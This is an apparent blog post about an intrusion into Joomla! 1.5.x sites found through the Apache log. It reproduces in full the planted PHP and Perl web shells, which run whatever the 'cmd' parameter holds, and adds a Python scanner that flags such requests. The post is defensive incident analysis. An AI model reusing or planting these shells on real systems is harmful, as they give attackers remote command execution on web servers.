Joomla Bug Day at OSCC MAMPU

We spent the whole morning discussing the Joomla! 1.5.x (1.5.5 and below) bug. You can read Indhran's blog about how we reset the admin password.

Rescue Your Joomla 1.5.x Sites

Related blog post

Then Abdullah, our Hightech Rojak blogger, found something in the Apache log.

This request, carrying a shell command in the cmd parameter:

http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls

When we tried it in a web browser such as Mozilla Firefox, it listed all the files in the directory. I used that link to find the location of the mod_jsys.php file and then used cat to view the file, again simply from Mozilla Firefox:

http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php

--------- mod_jsys.php content

Welcome Welcome

<?php
// Opening tag restored here; it was swallowed when the file was viewed through the browser.

// Make the Perl twin of this backdoor executable as a CGI script.
chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);

// Backdoor: whatever arrives in the "cmd" parameter is run as a shell command
// with the web server's privileges and the output is echoed back.
if(!empty($_REQUEST['cmd'])) {
$buf = shell_exec($_REQUEST['cmd']);
$buf = str_replace("\n", "<br>\n", $buf); // the <br> tag was stripped in the captured copy
echo $buf;
}

// "patch" mode: rewrite com_user's reset.php so that an empty activation token is
// rejected (the Joomla! 1.5 password-reset token bug), presumably to keep other
// intruders out of a site that has already been taken over.
if(!empty($_REQUEST['patch'])) {
$fd = fopen("../../components/com_user/models/reset.php", "r");
$fd2 = fopen("../../tmp/p", "w");
if(!$fd) {
echo "Unable to patch";
exit;
}
while($buf = fgets($fd)) {
if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
fwrite($fd2, $buf); // copy every line except the vulnerable query
}
else {
fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
die("FUCK OFF RETARD");
}'."\n");
fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
}
}
fclose($fd2);
$res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
if($res) {
echo "Patched";
}
else {
echo "Patch failed, unable to copy file";
system("rm -f ../../tmp/p");
}
}

?>

---- mod_jsys.cgi content

#!/usr/bin/perl

print "Content-type: text/html\r\n\r\n";

print "Welcome\n";

# Same backdoor as the PHP file, as a CGI script: take the value after "=" in the
# query string, percent-decode it, run it in a shell and print the output.
@cmd = split(/=/, $ENV{'QUERY_STRING'});
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/<br>\n/g;   # the <br> tag was stripped in the captured copy
print $cmd;
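Since the backdoor was spotted in the Apache log, here is a small log check, added as an example and not part of the original post: it parses access-log lines, percent-decodes the query string the way the Perl shell does, and flags requests that carry a shell command in the cmd parameter or that hit a .php/.cgi file directly under /modules/ (Joomla! modules normally run through index.php, so such direct hits are unusual). The sample log lines, IP addresses and timestamps are constructed; the request paths mirror the ones in this post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined"-style access log line (constructed samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Query parameter the shell on oscc.lan used for its command; add others you see.
CMD_PARAMS = ("cmd",)
# First words that mean "run a shell command", not a normal Joomla! request.
SHELL_WORDS = {"ls", "cat", "id", "uname", "pwd", "wget", "curl", "chmod", "rm"}

def parse_line(line):
    """Split one access-log line into its fields plus a decoded query dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values ("cat%20/etc" -> "cat /etc"), as the Perl shell does.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec

def find_webshell_hits(lines):
    """Return (ip, path, command) for requests that look like web-shell use."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Modules are loaded inside index.php; a direct GET of a script under
        # /modules/ is already unusual and worth a look on its own.
        direct_module = rec["path"].startswith("/modules/") and rec["path"].endswith((".php", ".cgi"))
        for name in CMD_PARAMS:
            cmd = rec["query"].get(name, "")
            first = cmd.split()[0] if cmd.split() else ""
            if first in SHELL_WORDS or (direct_module and cmd):
                hits.append((rec["ip"], rec["path"], cmd))
    return hits

# Constructed sample log: IPs and timestamps are made up, the requests mirror the post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2008:09:14:02 +0800] "GET /modules/mod_jsys/mod_jsys.php?cmd=ls HTTP/1.1" 200 1532
10.0.0.9 - - [12/Aug/2008:09:15:10 +0800] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8831
10.0.0.5 - - [12/Aug/2008:09:15:47 +0800] "GET /modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php HTTP/1.1" 200 2210
10.0.0.5 - - [12/Aug/2008:09:17:30 +0800] "GET /modules/mod_jsys/mod_jsys.cgi?cmd=id HTTP/1.1" 200 61
"""
```

Run find_webshell_hits(SAMPLE_LOG.splitlines()) against a real access_log to get the same three-column list; the normal com_content request is not reported.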
